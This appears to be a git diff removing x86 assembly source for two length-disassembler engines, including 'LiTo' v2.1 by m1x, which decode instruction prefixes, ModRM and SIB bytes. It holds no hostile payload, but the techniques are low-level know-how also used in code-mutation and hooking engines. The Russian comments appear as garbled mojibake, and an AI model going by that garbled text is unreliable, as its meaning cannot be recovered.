|
|
||||||
mov esi, [esp + 36] ; pointer to opcode
|
|
||||||
sub esp, 256 ; allocate space for the table in stack
|
|
||||||
mov ebp, esp ; ebp <- opcode table
|
|
||||||
mov edi, esp
|
|
||||||
push esi
|
|
||||||
;; (1) unpack table
|
|
||||||
mov edx, esp ; save stack pointer
|
|
||||||
push 115
|
|
||||||
pop ecx
|
|
||||||
call .data
|
|
||||||
db 0x45,0x29,0x20,0x45,0x29,0x20,0x45,0x29
|
|
||||||
db 0x20,0x45,0x29,0x20,0x45,0x29,0x36,0x45
|
|
||||||
db 0x29,0x36,0x45,0x29,0x36,0x45,0x29,0x36
|
|
||||||
db 0xe0,0xe0,0x60,0x25,0x57,0x30,0x28,0x40
|
|
||||||
db 0xe7,0x27,0x2c,0x2b,0xc5,0xa0,0x31,0x40
|
|
||||||
db 0x4f,0x40,0x29,0x60,0x87,0x8f,0x2b,0x2d
|
|
||||||
db 0x25,0x2c,0x2e,0x2d,0x22,0x20,0x45,0x27
|
|
||||||
db 0x20,0x85,0x87,0x2f,0x32,0x40,0x36,0x37
|
|
||||||
db 0x20,0x25,0x60,0x65,0x33,0x40,0x35,0x34
|
|
||||||
db 0x23,0x85,0x26,0x75,0x45,0x46,0x85,0x60
|
|
||||||
db 0xb5,0xe5,0xe5,0xe5,0x65,0x4b,0x25,0x24
|
|
||||||
db 0x85,0xef,0x2f,0xe5,0x25,0x20,0x21,0x2a
|
|
||||||
db 0x25,0x20,0x21,0x2a,0xa5,0x35,0x2a,0x65
|
|
||||||
db 0x2a,0x2b,0x2a,0x80,0x34,0xe5,0xe5,0x25
|
|
||||||
db 0x34,0xc5,0x26
|
|
||||||
; xlat table
|
|
||||||
db 0x00,0x01,0x02,0x03,0x10,0x11,0x1e,0x22
|
|
||||||
db 0x23,0x28,0x31,0x33,0x39,0x40,0x60,0x88
|
|
||||||
db 0x89,0xc0,0xc2,0xe0,0xe1,0xee,0xf0,0xff
|
|
||||||
.data: pop esi
|
|
||||||
lea ebx, [esi + ecx]
|
|
||||||
xor eax, eax
|
|
||||||
.next: lodsb
|
|
||||||
push ecx
|
|
||||||
mov ecx, eax
|
|
||||||
shr ecx, 5
|
|
||||||
and al, 31
|
|
||||||
xlat
|
|
||||||
rep stosb
|
|
||||||
pop ecx
|
|
||||||
loop .next
|
|
||||||
mov esp, edx ; restore stack frame
|
|
||||||
;; /unpack
|
|
||||||
pop esi
|
|
||||||
push edi ; (2)
|
|
||||||
mov edi, esi ; (3)
|
|
||||||
|
|
||||||
cmp word [esi], 20cdh ; VXD call (6 bytes)
|
|
||||||
jne ExtFlags
|
|
||||||
inc esi
|
|
||||||
inc esi
|
|
||||||
lodsd
|
|
||||||
CalcLen: sub esi, edi ; (3)
|
|
||||||
cmp esi, 15
|
|
||||||
jbe OK
|
|
||||||
Error: xor esi, esi
|
|
||||||
dec esi
|
|
||||||
OK: pop esp ; (2)
|
|
||||||
mov [esp+4*7], esi
|
|
||||||
popad
|
|
||||||
ret
|
|
||||||
; ecx zero after loop
|
|
||||||
;==============================================================================
|
|
||||||
ExtFlags: xor eax, eax
|
|
||||||
xor ebx, ebx
|
|
||||||
cdq
|
|
||||||
lodsb ;al <- opcode
|
|
||||||
mov cl, al ;cl <- opcode
|
|
||||||
cmp al, 0fh ;Test on prefix 0Fh
|
|
||||||
jne NormTable
|
|
||||||
lodsb
|
|
||||||
inc ah ;EAX=al+100h (100h/2 - lenght first table)
|
|
||||||
NormTable: shr eax, 1 ;Elements tables on 4 bits
|
|
||||||
mov al, byte [ebp + eax]
|
|
||||||
jc IFC1
|
|
||||||
shr eax, 4 ;Get high 4-bits block if offset is odd, otherwise...
|
|
||||||
IFC1: and al, 0fh
|
|
||||||
xchg eax, ebx ;EAX will be needed for other purposes
|
|
||||||
CheckFlags: cmp bl, 0Eh ;Test on ErrorFlag
|
|
||||||
je Error
|
|
||||||
cmp bl, 0Fh ;Test on PrefixFlag
|
|
||||||
je Prefix
|
|
||||||
or ebx, ebx ;One byte command
|
|
||||||
jz CalcLen
|
|
||||||
btr ebx, 0 ;Command with ModRM byte
|
|
||||||
jc ModRM
|
|
||||||
btr ebx, 1 ;Test on imm8,rel8 etc flag
|
|
||||||
jc incr1
|
|
||||||
btr ebx, 2 ;Test on ptr16 etc flag
|
|
||||||
jc incr2
|
|
||||||
and bl, 11110111b ;Reset 16/32 sign
|
|
||||||
cmp cl, 0A0h ;Processing group 0A0h-0A3h
|
|
||||||
jb Check66h
|
|
||||||
cmp cl, 0A3h
|
|
||||||
ja Check66h
|
|
||||||
test ch, pref67h
|
|
||||||
jnz incr2
|
|
||||||
jmp incr4
|
|
||||||
Check66h: test ch, pref66h
|
|
||||||
jnz incr2
|
|
||||||
incr4: inc esi
|
|
||||||
inc esi
|
|
||||||
incr2: inc esi
|
|
||||||
incr1: inc esi
|
|
||||||
jmp_CheckFlags: jmp CheckFlags
|
|
||||||
;-----------------------------------------------
|
|
||||||
Prefix: cmp cl, 66h
|
|
||||||
je SetF66h
|
|
||||||
cmp cl, 67h
|
|
||||||
jne ExtFlags
|
|
||||||
SetF67h: or ch, pref67h
|
|
||||||
jmp ExtFlags
|
|
||||||
;-----------------------------------------------
|
|
||||||
SetF66h: or ch, pref66h
|
|
||||||
jmp ExtFlags
|
|
||||||
;-----------------------------------------------
|
|
||||||
ModRM: lodsb
|
|
||||||
cmp cl, 0F7h ;Check on 0F6h and 0F7h groups
|
|
||||||
je F6F7
|
|
||||||
cmp cl, 0F6h
|
|
||||||
jne ModXX
|
|
||||||
F6F7: test al, 00111000b ;Processing groups 0F6h and 0F7h
|
|
||||||
jnz ModXX
|
|
||||||
test cl, 00000001b
|
|
||||||
jz incbt1
|
|
||||||
test ch, 1
|
|
||||||
jnz incbt2
|
|
||||||
inc esi
|
|
||||||
inc esi
|
|
||||||
incbt2: inc esi
|
|
||||||
incbt1: inc esi
|
|
||||||
ModXX: mov edx, eax ;Processing MOD bits
|
|
||||||
and al, 00000111b ;al <- only R/M bits
|
|
||||||
test dl, 11000000b ;Check MOD bits
|
|
||||||
jz Mod00
|
|
||||||
jp CheckFlags ;Or c_Mod11
|
|
||||||
js Mod10
|
|
||||||
Mod01: test ch, pref67h
|
|
||||||
jnz incr1 ;16-bit addressing
|
|
||||||
cmp al, 4 ;Check SIB
|
|
||||||
je incr2
|
|
||||||
jmp incr1
|
|
||||||
;-----------------------------------------------
|
|
||||||
Mod00: test ch, pref67h
|
|
||||||
jz Mod00_32 ;32-bit addressing
|
|
||||||
cmp al, 6
|
|
||||||
je incr2
|
|
||||||
jmp jmp_CheckFlags
|
|
||||||
;-----------------------------------------------
|
|
||||||
Mod00_32: cmp al, 4 ;Check SIB
|
|
||||||
jne disp32
|
|
||||||
lodsb ;Processing SIB byte
|
|
||||||
and al, 00000111b
|
|
||||||
disp32: cmp al, 5
|
|
||||||
je incr4
|
|
||||||
jmp jmp_CheckFlags
|
|
||||||
;-----------------------------------------------
|
|
||||||
Mod10: test ch, pref67h
|
|
||||||
jnz incr2 ;16-bit addressing
|
|
||||||
cmp al, 4 ;Check SIB
|
|
||||||
jne incr4
|
|
||||||
inc esi
|
|
||||||
jmp incr4
|
|
Binary file not shown.
@ -1,398 +0,0 @@
|
|||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
; ### ;
|
|
||||||
; ### ;
|
|
||||||
; ### #################################################### ;
|
|
||||||
; ### #################################################### ;
|
|
||||||
; ### ### ### ;
|
|
||||||
; ### ### ### ######### ### ;
|
|
||||||
; ### ### ### ########### ;
|
|
||||||
; ### ### ## ## ;
|
|
||||||
; ### ### ### ## ## ;
|
|
||||||
; ### ### ### ## ## ;
|
|
||||||
; ### ### ### ### ## ## ;
|
|
||||||
; ### ### ### ### ## ## ;
|
|
||||||
; ############ ### ### ########### ;
|
|
||||||
; ################################################################ ;
|
|
||||||
; ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; Advanced Length dIsassembler moTOr:) ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ;
|
|
||||||
; ‚¥àá¨ï 2.1 ;
|
|
||||||
; ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
;äãªæ¨ï _LiTo_ ;
|
|
||||||
;¤¨§ áᥬ¡«¨à®¢ ¨¥ ¬ 訮© ª®¬ ¤ë ;
|
|
||||||
;®¯à¥¤¥«¥¨¥ ¤«¨ë ¬ 訮© ª®¬ ¤ë ;
|
|
||||||
;‚室: ;
|
|
||||||
;esi - ¤à¥á à §¡¨à ¥¬®© ¬ 訮© ª®¬ ¤ë ;
|
|
||||||
;edi - 㪠§ â¥«ì ¢ë室ãî áâàãªâãàã (¨«¨ ¡ãä¥à) ( §®¢¥¬ ¥¥ INSTR:) ;
|
|
||||||
;‚ë室: ;
|
|
||||||
;¢ eax - ¤«¨ ¬ 訮© ª®¬ ¤ë. ;
|
|
||||||
;‡ ¬¥âª¨: ;
|
|
||||||
;(x) ‚ë室 ï áâàãªâãà (¨«¨ ¡ãä¥à) § ¯®«ï¥âáï ¢ ¯à®æ¥áᥠ¤¨§ áᥬ¡«¨à®¢ ¨ï ;
|
|
||||||
;¨áâàãªæ¨¨ ¨ ¤®«¦ ¯à¥¤áâ ¢«ïâì ᮡ®© á«¥¤ãî饥: ;
|
|
||||||
; ;
|
|
||||||
; INSTR1 struct ;
|
|
||||||
; (+ 00) len_com db 00h ; - ¤«¨ ª®¬ ¤ë; ;
|
|
||||||
; (+ 01) flags dd 00h ; - ¢ëáâ ¢«¥ë¥ ä« £¨ ;
|
|
||||||
; (+ 05) seg db 00h ; - ᥣ¬¥â (¥á«¨ ¥áâì); ;
|
|
||||||
; (+ 06) repx db 00h ; - ¯à¥ä¨ªá (0F2h/0F3h) (¥á«¨ ¥áâì); ;
|
|
||||||
; (+ 07) len_offset db 00h ; - à §¬¥à ᬥ饨ï; ;
|
|
||||||
; (+ 08) len_operand db 00h ; - à §¬¥à ®¯¥à ¤ ; ;
|
|
||||||
; (+ 09) opcode db 00h ; - ®¯ª®¤ (¥á«¨ ®¯ª®¤=0Fh, ⮣¤ ;
|
|
||||||
; ; áî¤ á®åà ï¥âáï 2-®© ®¯ª®¤, ¨ ;
|
|
||||||
; ; ãáâ ¢«¨¢ ¥âáï ä« £ B_OPCODE2); ;
|
|
||||||
; (+ 10) modrm db 00h ; - ¡ ©â MODRM (â ª¦¥, ¥á«¨ ¥áâì) ;
|
|
||||||
; (+ 11) sib db 00h ; - ¡ ©â SIB ;
|
|
||||||
; (+ 12) offset db 8 dup (00h); - ᬥ饨¥ ¨áâàãªæ¨¨ ;
|
|
||||||
; (+ 20) operand db 8 dup (00h); - ®¯¥à ¤ ¨áâàãªæ¨¨ ;
|
|
||||||
; INSTR1 ends ;
|
|
||||||
; ;
|
|
||||||
;(å) ¯®¨¬ îâáï (¯®ª ) ⮫쪮 general purpose & fpu instructions ;
|
|
||||||
; (®áâ «ìë¥ - ¢ ⮯ªã:)! ;
|
|
||||||
;(å) ¥â ¯à®¢¥àª¨ ¬ ªá¨¬ «ìãî ¤«¨ã ¨áâàãªæ¨¨ (15 ¡ ©â) ( åà¥) ;
|
|
||||||
;(å) Š ª ¯®áâ஥ë í⨠⠡«¨çª¨: ;
|
|
||||||
; Ž—…<E28094>œ <20><>Ž‘’Ž: â ª ª ª ¢ í⮬ ¤¨§ ᬥ ¨á¯®«ì§ãîâáï ä« £¨ á ç¨á«®¢ë¬ ;
|
|
||||||
; ®¡®§ 票¥¬ <=8, â® ¤«ï ®¤®£® ä« £ ¤®áâ â®ç® ¬¥áâ ¢ ¯®«®¢¨ã ¡ ©â ;
|
|
||||||
; (¬ ªá¨¬ «ì®¥ ç¨á«® =8 (B_PREFIX6X) - ¢ ¤¢®¨ç®¬ ¯à¥¤áâ ¢«¥¨¨ =1000b). ;
|
|
||||||
; ‡ ï íâ®, ¯à®áâ® â㯮 ¢ ®¤¨ ¡ ©â § ¯¨å¨¢ ¥¬ 2 ä« £ - ¢®â ¨ ¢á¥. ’ ª¨¬ ;
|
|
||||||
; ®¡à §®¬, ª ¦¤ ï â ¡«¨çª ¢ 256 ¡ ©â ã१ ¥âáï ¤® 128. ;
|
|
||||||
;(å) „«ï 32-¡¨â®£® ¨á¯®«ï¥¬®£® ª®¤ . ;
|
|
||||||
;(å) Šâ® å®ç¥â, ¯ãáâì 䨣 á ¬ ¨ ¤®¡ ¢«ï¥â ®áâ «ìë¥ ª®¬ ¤ë ¨ ¢á直¥ â ¬ ;
|
|
||||||
; ¯à®¢¥àª¨. ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ”ˆ—ˆ: ;
|
|
||||||
;(+) ¡ §®¥§ ¢¨á¨¬®áâì ;
|
|
||||||
;(+) 㯠ª®¢ ë¥ â ¡«¨çª¨ ;
|
|
||||||
; ;
|
|
||||||
;(-) ¬ãâ®à® ¤®¡ ¢«ïâì ®¢ë¥ ¨áâàãªæ¨¨ ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
; ˆ‘<CB86>Ž‹œ‡Ž‚€<E2809A>ˆ…: ;
|
|
||||||
;1)<29>®¤ª«î票¥: ;
|
|
||||||
; lito.asm ;
|
|
||||||
;2)‚맮¢:(¯à¨¬¥à) ;
|
|
||||||
; lea esi,XXXXXXXXh ; ¤à¥á ª®¬ ¤ë, çìî ¤«¨ã ¤® 㧠âì ;
|
|
||||||
; lea edi,XXXXXXXXh ;lea edi,INSTR1 ;
|
|
||||||
; call LiTo ;
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;
|
|
||||||
|
|
||||||
|
|
||||||
;m1x
|
|
||||||
;pr0mix@mail.ru
|
|
||||||
|
|
||||||
_LiTo_:
|
|
||||||
pushad
|
|
||||||
call _delta_lito_
|
|
||||||
;===================================================================================
|
|
||||||
|
|
||||||
;áâப ¯à¥ä¨ªá®¢
|
|
||||||
pfx:
|
|
||||||
db 2Eh,36h,3Eh,26h,64h,65h,0F2h,0F3h,0F0h,66h,67h
|
|
||||||
|
|
||||||
SizePfx equ $-pfx ;¤«¨ pfx
|
|
||||||
|
|
||||||
;===================================================================================
|
|
||||||
|
|
||||||
;â ¡«¨æ ä« £®¢ ¤«ï ®¤®¡ ©âëå ®¯ª®¤®¢
|
|
||||||
TableFlags1:
|
|
||||||
|
|
||||||
; 01 23 45 67 89 AB CD EF
|
|
||||||
db 11h,11h,28h,00h,11h,11h,28h,00h ;00
|
|
||||||
db 11h,11h,28h,00h,11h,11h,28h,00h ;01
|
|
||||||
db 11h,11h,28h,00h,11h,11h,28h,00h ;02
|
|
||||||
db 11h,11h,28h,00h,11h,11h,28h,00h ;03
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;04
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;05
|
|
||||||
db 00h,11h,00h,00h,89h,23h,00h,00h ;06
|
|
||||||
db 22h,22h,22h,22h,22h,22h,22h,22h ;07
|
|
||||||
db 39h,33h,11h,11h,11h,11h,11h,11h ;08
|
|
||||||
db 00h,00h,00h,00h,00h,0C0h,00h,00h ;09
|
|
||||||
db 88h,88h,00h,00h,28h,00h,00h,00h ;0A
|
|
||||||
db 22h,22h,22h,22h,88h,88h,88h,88h ;0B
|
|
||||||
db 33h,40h,11h,39h,60h,40h,02h,00h ;0C
|
|
||||||
db 11h,11h,22h,00h,11h,11h,11h,11h ;0D
|
|
||||||
db 22h,22h,22h,22h,88h,0C2h,00h,00h ;0E
|
|
||||||
db 00h,00h,00h,11h,00h,00h,00h,11h ;0F
|
|
||||||
|
|
||||||
|
|
||||||
;===================================================================================
|
|
||||||
|
|
||||||
;â ¡«¨æ ä« £®¢ ¤«ï ¤¢ãå¡ ©âëå ®¯ª®¤®¢
|
|
||||||
TableFlags2:
|
|
||||||
|
|
||||||
; 01 23 45 67 89 AB CD EF
|
|
||||||
db 11h,11h,00h,00h,00h,00h,01h,00h ;00
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,01h ;01
|
|
||||||
db 11h,11h,00h,00h,00h,00h,00h,00h ;02
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;03
|
|
||||||
db 11h,11h,11h,11h,11h,11h,11h,11h ;04
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;05
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;06
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;07
|
|
||||||
db 88h,88h,88h,88h,88h,88h,88h,88h ;08
|
|
||||||
db 11h,11h,11h,11h,11h,11h,11h,11h ;09
|
|
||||||
db 00h,01h,31h,00h,00h,01h,31h,01h ;0A
|
|
||||||
db 11h,11h,11h,11h,00h,31h,11h,11h ;0B
|
|
||||||
db 11h,00h,00h,01h,00h,00h,00h,00h ;0C
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;0D
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;0E
|
|
||||||
db 00h,00h,00h,00h,00h,00h,00h,00h ;0F
|
|
||||||
;===================================================================================
|
|
||||||
|
|
||||||
SizeTbl equ $-pfx
|
|
||||||
;===================================================================================
|
|
||||||
;ä« £¨
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
B_NONE equ 00h ;xex
|
|
||||||
B_MODRM equ 01h ;present byte MODRM
|
|
||||||
B_DATA8 equ 02h ;present imm8,rel8, etc
|
|
||||||
B_DATA16 equ 04h ;present imm16,rel16, etc
|
|
||||||
B_PREFIX6X equ 08h ;present imm16/imm32 (¢ § ¢¨á¨¬®á⨠®â «¨ç¨ï ¯à¥ä¨ªá 0x66 (0x67 ¤«ï ®¯ª®¤®¢ 0xA0-0xA3))
|
|
||||||
B_SEG equ 10h ;present segment (¯à¨¬¥à: 0x2e,0x3E, etc)
|
|
||||||
B_PFX66 equ 20h ;present byte 0x66
|
|
||||||
B_PFX67 equ 40h ;present byte 0x67
|
|
||||||
B_LOCK equ 80h ;present byte LOCK (0xF0)
|
|
||||||
B_REP equ 100h ;present byte rep[e/ne]
|
|
||||||
B_OPCODE2 equ 200h ;present second opcode (first opcode=0x0F)
|
|
||||||
B_SIB equ 400h ;present byte SIB
|
|
||||||
B_RELX equ 800h ;present jxx/jmp/call (rel8,rel16,rel32)
|
|
||||||
;===================================================================================
|
|
||||||
|
|
||||||
_delta_lito_:
|
|
||||||
pop ebp
|
|
||||||
cld
|
|
||||||
xor eax,eax
|
|
||||||
xor ebx,ebx
|
|
||||||
cdq ;¢ edx: dl(0/1) - ¥â/¥áâì ¯à¥ä¨ªá 0x66
|
|
||||||
; dh(0/1) - ¥â/¥áâì ¯à¥ä¨ªá 0x67
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG ¯®¨áª ¯à¥ä¨ªá®¢xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
_nextpfx_:
|
|
||||||
lodsb ;¯®«ãç ¥¬ ®ç¥à¥¤®© ¡ ©â ª®¬ ¤ë
|
|
||||||
push edi
|
|
||||||
lea edi,[ebp+(pfx-_delta_lito_+SizeTbl)] ;¢ edi - ¤à¥á áâப¨ ¯à¥ä¨ªá®¢
|
|
||||||
db 6Ah,SizePfx
|
|
||||||
pop ecx
|
|
||||||
repne scasb ;¥áâì «¨ ¢ à §¡¨à ¥¬®© ª®¬ ¤¥ ¯à¥ä¨ªáë?
|
|
||||||
pop edi
|
|
||||||
jne _endpfx_ ;¥â? - ¢ë室
|
|
||||||
cmp ecx,5
|
|
||||||
jl _lock_
|
|
||||||
or bl,B_SEG
|
|
||||||
mov byte ptr [edi+05h],al ;seg
|
|
||||||
_lock_:
|
|
||||||
cmp al,0F0h
|
|
||||||
jne _rep_
|
|
||||||
or bl,B_LOCK
|
|
||||||
_rep_:
|
|
||||||
mov ch,al
|
|
||||||
and ch,0FEh
|
|
||||||
cmp ch,0F2h
|
|
||||||
jne _66_
|
|
||||||
or bx,B_REP
|
|
||||||
mov byte ptr [edi+06h],al ;rep
|
|
||||||
_66_:
|
|
||||||
cmp al,66h ;¨ ç¥ á¬®âਬ, íâ® 0x66?
|
|
||||||
jne _67_
|
|
||||||
mov dl,1
|
|
||||||
or bl,B_PFX66
|
|
||||||
_67_:
|
|
||||||
cmp al,67h ;¨ ç¥, íâ® 0x67?
|
|
||||||
jnz _nextpfx_ ;¥á«¨ ¥â, â® ¨é¥¬ ¤à㣨¥ ¯à¥ä¨ªáë
|
|
||||||
mov dh,1
|
|
||||||
or bl,B_PFX67
|
|
||||||
jmp _nextpfx_ ;¯à®¤®«¦ ¥¬ ¯®¨áª
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND ¯®¨áª ¯à¥ä¨ªá®¢xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
_endpfx_:
|
|
||||||
_search_jxx_call_jmp_:
|
|
||||||
mov ch,al
|
|
||||||
and ch,0FEh
|
|
||||||
cmp ch,0E8h
|
|
||||||
je _jxxok_
|
|
||||||
mov ch,al
|
|
||||||
and ch,11110000b
|
|
||||||
cmp ch,70h
|
|
||||||
je _jxxok_
|
|
||||||
cmp al,0EBh
|
|
||||||
je _jxxok_
|
|
||||||
cmp al,0Fh ;®¯ª®¤ á®á⮨⠨§ 2-å ¡ ©â?
|
|
||||||
jne _opcode_
|
|
||||||
lodsb ;¥á«¨ ¤ , â® ¡¥à¥¬ 2-®© ¡ ©â ®¯ª®¤
|
|
||||||
mov cl,80h ;¨ 㢥«¨ç¨¢ ¥¬ cl=80h
|
|
||||||
or bx,B_OPCODE2
|
|
||||||
mov ch,al
|
|
||||||
and ch,11110000b
|
|
||||||
cmp ch,80h
|
|
||||||
jne _opcode_
|
|
||||||
_jxxok_:
|
|
||||||
or bx,B_RELX
|
|
||||||
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
_opcode_:
|
|
||||||
xor ch,ch
|
|
||||||
mov byte ptr [edi+09h],al ;save first opcode
|
|
||||||
lea ebp,[ebp+ecx+(TableFlags1-_delta_lito_+SizeTbl)];¢ edi - ¤à¥á 㦮© â ¡«¨æë ä« £®¢(å à-ª)
|
|
||||||
cmp al,0A0h ;¥á«¨ ®¯ª®¤>=0xA0 ¨ ®¯ª®¤<=A3,
|
|
||||||
jl _01_;jb ;
|
|
||||||
cmp al,0A3h
|
|
||||||
jg _01_
|
|
||||||
test cl,cl
|
|
||||||
jne _01_;je ;â® dl=dh
|
|
||||||
mov dl,dh ;mov dl,dh
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
_01_:
|
|
||||||
push eax
|
|
||||||
shr eax,1
|
|
||||||
mov cl,byte ptr [ebp+eax] ;¢ cl - ä« £¨ ª®¬ ¤ë
|
|
||||||
jc _noCF_
|
|
||||||
shr cl,4
|
|
||||||
_noCF_:
|
|
||||||
and cl,0Fh
|
|
||||||
xor ebp,ebp ;¢ ebp - ¡ã¤¥â åà ¨âìáï ¤«¨ ᬥ饨ï(offset)
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG à §¡®à MODRMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
or ecx,ebx
|
|
||||||
pop ebx ;bl=opcode
|
|
||||||
test cl,B_MODRM ;¯à¨áãâáâ¢ã¥â «¨ ¡ ©â modrm?
|
|
||||||
je _endmodrm_ ;¥â? ¢ë室
|
|
||||||
lodsb ;al=modrm
|
|
||||||
mov byte ptr [edi+10],al ;MODRM
|
|
||||||
mov ah,al
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
shr ah,6 ;ah=mod
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
test al,38h ;¤ «¥¥ ᬮâਬ, à ¢® «¨ ¯®«¥ reg==0?
|
|
||||||
jne _03_
|
|
||||||
sub bl,0F6h ;¥á«¨ ¤ , ⮠ᬮâਬ ®¯ª®¤:
|
|
||||||
jne _02_ ;à ¢¥ «¨ ® 0xF6 ¨«¨ 0xF7(test)?
|
|
||||||
or cl,B_DATA8 ;¥á«¨ ¤ , â® ãáâ ¢«¨¢ ¥¬ ã¦ë© ä« £
|
|
||||||
_02_:
|
|
||||||
dec ebx
|
|
||||||
jne _03_
|
|
||||||
or cl,B_PREFIX6X
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
_03_:
|
|
||||||
and al,07h
|
|
||||||
xor ebx,ebx ;bl ®â¢¥ç ¥â § ¯à¨áãâá⢨¥ ¡ ©â sib
|
|
||||||
mov bh,ah ;bh=mod
|
|
||||||
cmp dh,1 ;¥áâì «¨ ¢ à §¡¨à ¥¬®© ª®¬ ¤¥ ¯à¥ä¨ªá 0x67?
|
|
||||||
je _mod00_ ;¥á«¨ ¤ , â® ¯¥à¥áª ª¨¢ ¥¬
|
|
||||||
cmp al,4 ;¨ ç¥ ¯à®¢¥à塞,à ¢® «¨ ¯®«¥ rm==4?
|
|
||||||
jne _mod00_
|
|
||||||
inc ebx ;¥á«¨ ¤ , â® ¢®§¬®¦® ¥áâì sib
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
_mod00_:
|
|
||||||
test ah,ah ;¯®«¥ mod==0?
|
|
||||||
jne _mod01_
|
|
||||||
dec dh ;ᮤ¥à¦¨â «¨ ª®¬ ¤ 0x67?
|
|
||||||
jne _nop67_ ;¥â? ¯¥à¥áª ª¨¢ ¥¬
|
|
||||||
cmp al,6 ;¥á«¨ ¤ , â® rm==6?
|
|
||||||
jne _sib_
|
|
||||||
inc ebp ;¥á«¨ ¤ , â® ¤«¨ ᬥ饨ï=2(16 bit)
|
|
||||||
inc ebp
|
|
||||||
_nop67_:
|
|
||||||
cmp al,5 ;¨ ç¥, rm==5?
|
|
||||||
jne _sib_
|
|
||||||
add ebp,4 ;¥á«¨ ¤ , â® ¤«¨ ®ääá¥â =4 (32 bit)
|
|
||||||
jmp _sib_ ;¨¤¥¬ ¤ «ìè¥
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
_mod01_: ;mod==1?
|
|
||||||
dec ah
|
|
||||||
jne _mod02_
|
|
||||||
inc ebp ;¤ ? ⮣¤ ebp=1
|
|
||||||
jmp _sib_
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
_mod02_: ;mod==2?
|
|
||||||
dec ah
|
|
||||||
jne _mod03_
|
|
||||||
inc ebp ;ebp=2
|
|
||||||
inc ebp
|
|
||||||
dec dh ;¥á«¨ ¥áâì ¯à¥ä¨ªá 0x67, ¯¥à¥áª ª¨¢ ¥¬ ¤ «ìè¥
|
|
||||||
je _sib_
|
|
||||||
inc ebp ;â® ebp+=2
|
|
||||||
inc ebp
|
|
||||||
inc ebx
|
|
||||||
;-----------------------------------------------------------------------------------
|
|
||||||
_mod03_: ;mod==3?
|
|
||||||
dec bl ;¥á«¨ ¤ , ⮣¤ sib' â®ç® ¥â!
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxEND à §¡®à MODRMxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
|
|
||||||
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxBEG ¯®«ã票¥ SIBxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|
||||||
_sib_:
|
|
||||||
dec bl ;¥áâì «¨ ¡ ©â sib?
|
|
||||||
jne _endmodrm_
|
|
||||||
or cx,B_SIB
|
|
||||||
lodsb ;¥á«¨ ¤ , â® ¢ al ⥯¥àì «¥¦¨â sib(al=sib)
|
|
||||||
mov byte ptr [edi+11],al ;SIB
|
|
||||||
and al,7 ;¤ «¥¥,
|
|
||||||
cmp al,5 ;al==5?
|
|
||||||
jne _endmodrm_
|
|
||||||
test bh,bh ;¥á«¨ ¤ , ⮠ᬮâਬ, ¯®«¥ mod==0?
|
|
||||||
jne _endmodrm_
|
|
||||||
push 4 ;¥á«¨ ¤ , â® ¥áâì 4-¡ ©â®¢®¥ ᬥ饨¥
|
|
||||||
pop ebp
|
|
||||||
